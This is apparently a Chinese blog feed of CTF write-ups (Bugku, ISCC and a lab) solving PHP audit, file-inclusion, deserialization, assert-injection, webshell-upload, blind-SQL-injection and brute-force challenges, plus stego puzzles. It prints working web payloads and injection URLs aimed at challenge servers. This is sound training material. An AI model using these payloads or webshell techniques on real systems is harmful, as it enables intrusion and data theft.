清风的博客 Dandelion 2019-11-03T10:54:24.809Z http://yoursite.com/ 清风 Hexo web-实验室 http://yoursite.com/2019/11/03/web-实验室/ 2019-11-03T10:48:54.000Z 2019-11-03T10:54:24.809Z

friend

1

代码审计题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
<?php

//include("./class.php");

header("content-type:text/html;charset=utf-8");

error_reporting(0);

if(isset($_GET["file"])){     //isset检测变量是否设置

​    $file = $_GET["file"];

​    if(isset($_GET["password"])){

​       $password = $_GET["password"];

​       if(preg_match("/flag/",$file)){//preg_match正则表达式匹配在$file中查找flag

​            echo "不能现在就给你flag哦";

​            exit();  

​        }else{  

​            require_once($file);//[require_once](http://www.php.cn/wiki/141.html)语句和 

require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含

​            highlight_file("$file");//highlight_file() 函数对文件进行语法高亮显示

​            $password = unserialize($password);

//unserialize() 提供过滤的特性,可以防止非法数据进行代码注入,提供了更安全的反序列化数据

​            echo $password;

​        }

​    }else{

​        echo "需要密码的!<br>";

​    }

}else{

​    highlight_file('./index.php');

}



if(preg_match("/flag/",$file)){ 

​    echo "不能现在就给你flag哦";

​    exit();  

}else{  

​    include($file); 

​    $password = unserialize($password); 

​    echo $password;

}

?>

因为是GET传参所以在地址栏进行代码审计,首先根据题意输入?file=class.php

2

在其后补充密码得到下面的代码,得到一个flag_good.php,function __tostring输出字符串

file_get_contents() 函数把整个文件读入一个字符串中

3

在地址栏上输入?file=class.php&password=O:4:”Flag”:1:{s:4:”file”;s:13:”flag_good.php”;}

4

得到good后,查看源代码得到flag zkctf{132e9a8fcba14cbbaaad09c76d15bd07}

5

where is flag

6

本题属于文件包含题,

7

得到的编码,使用base64解码,得到flag zkctf{wuhu_include_lueluelue}

代码审计

8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<?php

include("./flag.php");

show_source(__FILE__);

error_reporting(0);

$a=$_GET['a'];

if(stripos($a,'.'))stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)本题是查找“.”在$a中第一次出现的位置

{

​    echo 'Hahahahahaha';

​    die();

}

$data = @file_get_contents($a,'r');file_get_contents() 函数把整个文件读入一个字符串中

if($data=="1433223!!!"){

​    if (isset ($_GET['password']))

​    {ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字母的字符是大小写敏感的

​        if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE){

​            echo 'You password must be alphanumeric';

​        }else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999){strlen() 函数返回字符串的长度。

​            if (strpos ($_GET['password'], '-') !== FALSE)

​            {

​                die('Flag: ' . $flag);

​            }else{

​                echo('- have not been found');

​            }

​        }else{

​            echo 'Invalid password';

​        }

​    }

}else{

​    echo 'Unhappy!';

}

?>

对于data,a用PHP伪协议php://input即可,它过滤了’.’,估计是不能用文件包含的,所以我们要用php伪协议post一个Data, password只能是字符串和数字,字符串的长度要小于8,值要大于9999999,因此要使用科学计数法所以1e8,2e8等等,password中必须要有’-‘,这是就要使用%00截断 ,最后得到flag:zkctf{the_ Code_audit_is_so_fun}

9

wramup

10

打开题目地址得到一个haha….,

11

点击右键查看源代码,有一个index.phps

12

在地址栏后输入index.phps,得到PHP代码

13

assert — 检查一个断言是否为 FALSE assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。 assertion 是字符串的优势是当禁用断言时它的开销会更小,并且在断言失败时消息会包含 assertion 表达式。

a=highlight_file()用高亮显示flag.php,用//注释掉(==$b)

?b=Hello%20word!&a=highlight_file(%27flag.php%27);// 得到flagzkctf{assert_is_s0_co01}

14

**upload15

打开题目地址,得到下面一个网页

16

首先想要的到东西,就要使用菜刀来链接,先准备一个一句话木马的病毒

文件名设为1.php

打开菜刀,点击右键选择添加,输入以下内容,最后点击添加

17

连接成功后,在数据库中查找flag

18

最后的到flag zkctf{Find_Hide_oN_The_Upl0ad}

19

sql-2

20

打开题目地址,发现就只有一句话Try id!,查看源代码发现也是这句话

21

在地址栏输入?id=1’ –+ 得到下图的一段话,发现是盲注,只要是对的就会出现下面一段话,否则为空白页面

22

23

24

25

http://47.99.176.38:5010/web9/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3E80--+

26

http://47.99.176.38:5010/web9/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),2,1))%3E113--+

27

http://47.99.176.38:5010/web9/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),2,1))%3E113--+

28

http://47.99.176.38:5010/web9/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27user%27%20and%20table_name%20regexp%20%27^us[a-z]%27%20limit%200,1)--+

29

http://47.99.176.38:5010/web9/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27user%27%20and%20column_name%20regexp%20%27^user%27%20limit%200,1)--+

30

]]> <a id="more"></a> <p><strong>friend</strong></p> <p><img src="http://i1.fuimg.com/702861/fc54083a29b95486.png" alt="1"></p> <p>代码审计题</p> <f bugku-web-请输入密码 http://yoursite.com/2019/11/02/bugku-web-请输入密码/ 2019-11-02T12:52:22.000Z 2019-11-02T12:56:13.125Z 请输入密码

打开链接,页面显示输入五位数的密码,我们可以用Burpsuite pro来爆破

img

在文本框里随便输入5位数字,进行抓包

img

把抓到的包点击Action,选择send to Intruder打开

img

点击Positions,先清除burp认为需要猜测的密码,然后选中pwd=12345,点击Add添加符号§

img

因为密码是五位数字组成的,所以Payload type选择Numbers数字类型的,因为是五位数数值的大小在10000到99999之间,step步骤填1步

img

在Options中,把number of threads改成100

img

最后点击start attack,在结果中找长度不一样的,可以发现一个五位数的密码13579

img

把密码输进到文本框中,点击查看,最后得到flag{bugku-baopo-hah}

]]> <h1 id="请输入密码"><a href="#请输入密码" class="headerlink" title="请输入密码"></a><strong>请输入密码</strong></h1> bugku-web-flag在index里 http://yoursite.com/2019/11/02/bugku-web-flag在index里/ 2019-11-02T12:49:31.000Z 2019-11-02T12:52:03.537Z flag在index里

img

该题是经典的文件包含漏洞+PHP伪协议的结合

打开链接,发现点击click me?no还有一个PHP文件

img

因为看不到PHP文件里的内容,所以可以用PHP伪协议的封装协议php://filter

img

php://filter

利用它可以读取服务器中的文件

由于读取文件的数据直接输出在了页面上,如果读取的是php文件的话,PHP代码在浏览器中,解析会不正常,那么我们可以用这个协议将php文件中的代码以base64的形式输出在页面上: Payload:

http://xxx.xxx.xxx.xxx/test/file.php?filename=php://filter/read=convert.base64-encode/resource=file.php

在url中输入view-source:http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

img

得到一长段代码,对代码进行base64解码得到下面一个html

Bugku-ctf click me? no';} $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } include($file); //flag:flag{edulcni_elif_lacol_si_siht} ?>

得到flag{edulcni_elif_lacol_si_siht}

]]> <h1 id="flag在index里"><a href="#flag在index里" class="headerlink" title="flag在index里"></a><strong>flag在index里</strong></h1> bugku-web-你必须让他停下来 http://yoursite.com/2019/11/02/bugku-web-你必须让他停下来/ 2019-11-02T12:47:29.000Z 2019-11-02T12:49:12.005Z 你必须让他停下来

img

打开链接,发现图片一直在跳,我们可以尝试抓包,抓包发现有十几张图片,多尝试几次,最后在10.jpg中发现了flag{dummy_game_1s_s0_popular}

img

]]> <h1 id="你必须让他停下来"><a href="#你必须让他停下来" class="headerlink" title="你必须让他停下来"></a>你必须让他停下来</h1> bugku-web-域名解析 http://yoursite.com/2019/11/02/bugku-web-域名解析/ 2019-11-02T12:40:12.000Z 2019-11-02T12:46:58.885Z 域名解析

img

题目是要把flag.baidu.com解析到123.206.87.240 上,直接打开flag.baidu.com发现没有域名

在Windows下修改的文件为C:\Windows\System32\drivers\etc\hosts

加上一句话123.206.87.240 flag.baidu.com

因为Windows10没有修改hosts的权限,所以会出现下面的情况

img

现在学习如何获取管理员权限

1,按徽标键+R

img

2,确定后会出现hosts文档

img

3,点击文件按钮

img

进入一个菜单页面,触碰到打开Windoes PowerShell(R),选择里面的以管理员身份打开Windoes PowerShell(R)

img

点击管理员后会弹出一个窗口,点击是

输入cmd并回车,就进入了管理员界面

img

再输入命令notepad hosts 并回车

img

最后我们就成功的打开了hosts文档,就可以进行需要的编辑了。

img

保存好后,在网页上打开flag.baidu.com就会出现flag

img

KEY{DSAHDSJ82HDS2211}

]]> <h1 id="域名解析"><a href="#域名解析" class="headerlink" title="域名解析"></a><strong>域名解析</strong></h1> bugku-web-web3 http://yoursite.com/2019/11/02/bugku-web-web3/ 2019-11-02T12:37:10.000Z 2019-11-02T12:43:41.132Z web3

打开链接一直在跳页面提示,查看源代码,发现一段可疑代码

img

用converter来进行代码转换HTML Decode编码得到flag KEY{J2sa42ahJK-HS11III}

img

]]> <h1 id="web3"><a href="#web3" class="headerlink" title="web3"></a><strong>web3</strong></h1> bugku-web-矛盾 http://yoursite.com/2019/11/02/bugku-web-矛盾/ 2019-11-02T12:30:54.000Z 2019-11-02T12:36:39.012Z 矛盾

img

is_numeric() 函数用于检测变量是否为数字或数字字符串。

本题最开始num不能等于数字或数字字符串,而要得到flag要让num=1

我们可以用科学计数法表示数字1,构造payload num=1e0.1

img

得到flag{bugku-789-ps-ssdf}

]]> <h1 id="矛盾"><a href="#矛盾" class="headerlink" title="矛盾"></a><strong>矛盾</strong></h1> bugku_web_GET http://yoursite.com/2019/09/28/bugku-web-GET/ 2019-09-28T13:02:19.000Z 2019-11-03T13:32:57.073Z web基础$_GET

1

打开链接发现是GTE传参,根据题意当what等于flag是输出flag,于是在URL上访问http://123.206.87.240:8002/get/?what=flag

2

得到flag{bugku_get_su8kej2en}

post与get的区别:

1.Post传输数据时,不需要在URL中显示出来,而Get方法要在URL中显示。

2.Post传输的数据量大,可以达到2M,而Get方法由于受到URL长度的限制,只能传递大约1024字节.

3.Post顾名思义,就是为了将数据传送到服务器段,Get就是为了从服务器段取得数据.而Get之所以也能传送数据,只是用来设计告诉服务器,你到底需要什么样的数据.Post的信息作为http请求的内容,而Get是在Http头部传输的。

]]> <h1 id="web基础-GET"><a href="#web基础-GET" class="headerlink" title="web基础$_GET"></a><strong>web基础$_GET</strong></h1> bugku_web_POST http://yoursite.com/2019/09/28/bugku-web-POST/ 2019-09-28T13:00:09.000Z 2019-11-03T13:30:47.193Z web基础$_POST

1

本题为POST传参,使用HackBar输出what=flag

2

得到flagflag{bugku_get_ssseint67se}

]]> <h1 id="web基础-POST"><a href="#web基础-POST" class="headerlink" title="web基础$_POST"></a><strong>web基础$_POST</strong></h1> bugku_web_计算机 http://yoursite.com/2019/09/28/bugku-web-计算机/ 2019-09-28T12:54:31.000Z 2019-11-03T13:29:05.955Z 计算机

1

发现是一个计算题,当你输入值时,发现只能输一位数,打开开发人员工具,里面的maxlength值等于1,所以只能输一位数,我们可以在input里增加属性吧maxlength值改到100.

2

改好后,打题目的计算结果输入验证得到flag{CTF-bugku-0032}

3

]]> <h1 id="计算机"><a href="#计算机" class="headerlink" title="计算机"></a><strong>计算机</strong></h1> bugku_web_web2 http://yoursite.com/2019/09/28/bugku-web-web2/ 2019-09-28T12:48:35.000Z 2019-11-02T12:18:40.363Z web2

1

看题目提示,打开链接,出现一堆笑脸朝你奔来

2

单击右键查看源代码,发现了flag KEY{Web-2-bugKssNNikls9100}

3

]]> <h1 id="web2"><a href="#web2" class="headerlink" title="web2"></a><strong>web2</strong></h1> ISCC http://yoursite.com/2019/06/13/ISCC-1/ 2019-06-13T13:20:54.000Z 2019-11-03T10:38:48.360Z MISC

ISCC1
将八进制的数转换成字符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include<iostream>
using namespace std;
int main()
{
char a[100]={0126,062,0126,0163,0142,0103,0102,0153,0142,062,065,0154,0111,0121,0157,0113,0111,
 0105,0132,0163,0131,0127,0143,066,0111,0105,0154,0124,0121,060,0116,067,0124,0152,0102,0146,0115,
0107,065,0154,0130,062,0116,0150,0142,0154,071,0172,0144,0104,0102,0167,0130,063,0153,0167,0144,
0130,060,0113};
int i;
for(i=0;i<60;i++)
{
printf("%c",a[i]);
}
return 0;
}

运行结果:

1
V2VsbCBkb25lIQoKIEZsYWc6IElTQ0N7TjBfMG5lX2Nhbl9zdDBwX3kwdX0K

再用base64来解密字符
Well done!

Flag: ISCC{N0_0ne_can_st0p_y0u}

img

附件下载,打看文件夹看到一堆汉字,我们仔细观察可以发现规律中间有一个空格的和两个空格的

使用c++编写程序把一个空格替换为0,两个空格替换为1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include<iostream>
using namespace std;

int main()

{

char ch[]="蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗
    萇條戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  
    萇條戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條蓅烺計劃 
    洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  
    萇條戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  
    萇條戶囗  萇條戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  
    萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 
    洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  
    萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  
    萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 
    洮蓠朩暒戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條戶囗  
    萇條戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  
    萇條戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  
    萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  
    萇條戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 
    洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 
    洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 
    洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  
    萇條蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條蓅烺計劃 
    洮蓠朩暒戶囗  萇條戶囗  萇條戶囗  萇條戶囗  萇條戶囗  萇條蓅烺計劃 洮蓠朩暒戶囗  萇條";

char \*p;

​p=ch;

while(\p!='\0')

​{

if(\*p==' '){

if(\(p+1)==' '){

cout<<1;

​p++;

​}else{

cout<<0;

​}

​}

​p++;

​}

return 0;

 }

使用转换工具将二进制转换成字符串

img

可以得到flag{ISCC WELCOME}

倒立屋

img

打开附件进行解压缩得到一张图片,此时就想要尝试一下图片解密

img

对于LSB隐写,我们可以使用Stegsolve工具

在工具中找到图片,并打开

img

打开后进行以下操作

img

找和flag相似的句子,我们可以发现本题的flag就在开头,我们仔细读题会发现重力反转,我们把IsCc_2019反过来的9102_cCsI,这就是flag

img

他们能在一起吗?

img

img

UEFTUyU3QjBLX0lfTDBWM19ZMHUlMjElN0Q=

用base64解码

PASS{0K_I_L0V3_Y0u!}

可以去试一下提交,发现不对

我们把这个二维码保存到本地,我们右键单击二维码,在打开方式栏选择360压缩打开得到下图的txt文件,点击该文件把刚刚解密的解码0K_I_L0V3_Y0u!输进去,最后得到flag

img

ISCC{S0rrY_W3_4R3_Ju5T_Fr1END}

无法运行的exe

img

附件下载该文件,进行解压,双击发现打不开

img

我们首先在桌面上建立一个文本文档并打开,把runnable.exe拖拽到打开的新建文档中

img

根据经验我们看开头的iVBORw0KGgAAAAA可以大概了解这是一张图片我们用base64图片在线转换工具上传一张类型为.png的图片会的解码为以“data:image/png;base64,”开头的编码因此我们tunnable.exe的编码加上前面这段编码点击Rase64还原图片

img

我们右单击图片点查看图片信息,出现如下图点另存为

img

使用WinHex打开另存为的图片,把图中的位置00改成0A,保存

img

png类型的图片的编码开头是固定的

img

弄好后右单击文件,点击打开方式选择画图,出现一个二维码,用手机扫描二维码得到flag

Aesop’s secret

img

附件下载好得到一张Aesop.gif的图片,我们首先在桌面上建立一个文本文档并打开,把Aesop.gif拖拽到打开的新建文档中,得到以下编码,通过观察我们可以知道在编码的最后面有以下蓝色的编码

img

使用在线加密解密工具对其进行解密

img

得到的明文再一次的进行解密,最后得到flag{DDiamondADeepDarkMine}

img

碎纸机

img

附件下载可以得到一张jpg图片

img

点击图片,单击右键选择打开方式,用360压缩文件打开,会得到几张jpg和一个redeme.txt

img

redeme.txt的内容为

碎纸机中居然是一堆黑色和白色的碎片,但是这些碎片之中到底会有什么样的宝藏呢?

我去问了欧鹏·曦文同学,他说他有办法恢复拼图原貌,但是前提是要我把真正有用的东西给他。

使用WinHex工具打开拼图,观察发现最后有一段被00包围的十六进制的编码

img

把这段编码复制下来,步骤如下

img

打开notepad++工具,把编码复制到里面去

img

ctrl+F 打开查找快捷键,查找0的字符,把视图调为自动换行,即可得到

img

对几幅图进行以上处理后得到

Flag={ISCC_is_so_interesting_!}

Reverse

img

附件下载打开是一个rev2.exe文件点击会发现,要输入用户名和密码

img

我们首先在桌面上建立一个文本文档并打开,把rev2.exe拖拽到打开的新建文档中会出现下面的代码仔细观察代码找规律会发现flag

img

flag{ST0RING_STAT1C_PA55WORDS_1N_FIL3S_1S_N0T_S3CUR3}

web1

img

img

给出了一个PHP源代码 代码审计

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
error_reporting(0);关闭错误报告

require 'flag.php';
    $value = $_GET['value'];

$password = $_GET['password'];     GET传参

$username = '';  赋值

for ($i = 0; $i < count($value); ++$i)  for循环语句当$i<count() 函数返回$value中元素的数目。

if ($value[$i] > 32 && $value[$i] < 127) unset($value);如果数目在32127则销毁$value

else $username .= chr($value[$i]);反则chr() 函数从指定 ASCII 值返回字符。(.=把右边的字串加到左边)

if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {echo 'Hello '.$username.'!', '<br>', PHP_EOL;

echo $flag, '<hr>';

img

运行结果:375307364355304365357351340367351329339323323306304305313

intval() 函数用于获取变量的整数值

要满足intval($password) < 2333 && intval($password + 1) > 2333 $username第一个字母w所对应的ascii码为119,在32-127范围内,因为chr()函数会自动进行mod256,所以可以传参119+256得到w,因为intval在如果参数是字符串,则返回字符串中第一个不是数字的字符之前的数字串所代表的整数值,就返回0,所以令$password=0xaaaa,字符$password和数字相加$password会先转成数字则intval($password)=0<2333,inval($password)>2333,输出flag

value[]=375&value[]=307&value[]=364&value[]=355&value[]=304&value[]=365&value[]=357&value[]=351&value[]=340&value[]=367&value[]=351&value[]=329&value[]=339&value[]=323&value[]=323&value[]=306&value[]=304&value[]=305&value[]=313&password=0xaaaa

得到:Hello w3lc0me_To_ISCC2019!

flag{8311873e241ccad54463eaa5d4efc1e9}

web4暂时未做出

img

isset() — 检测变量是否设置

($_SERVER[‘REQUEST_URI’]);获取完整参数URL parse_url()解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分

parse_str($query);将查询字符串解析到变量中

hash — 生成哈希值 ,要使用的哈希算法是sha256,来解析$key的值

]]> <h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1> Hello World http://yoursite.com/2019/06/05/hello-world/ 2019-06-05T13:25:55.972Z 2019-06-05T13:25:55.972Z Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

1
$ hexo new "My New Post"

More info: Writing

Run server

1
$ hexo server

More info: Server

Generate static files

1
$ hexo generate

More info: Generating

Deploy to remote sites

1
$ hexo deploy

More info: Deployment

]]> <p>Welcome to <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a>! This is your very first post. Check <a href="https://hexo.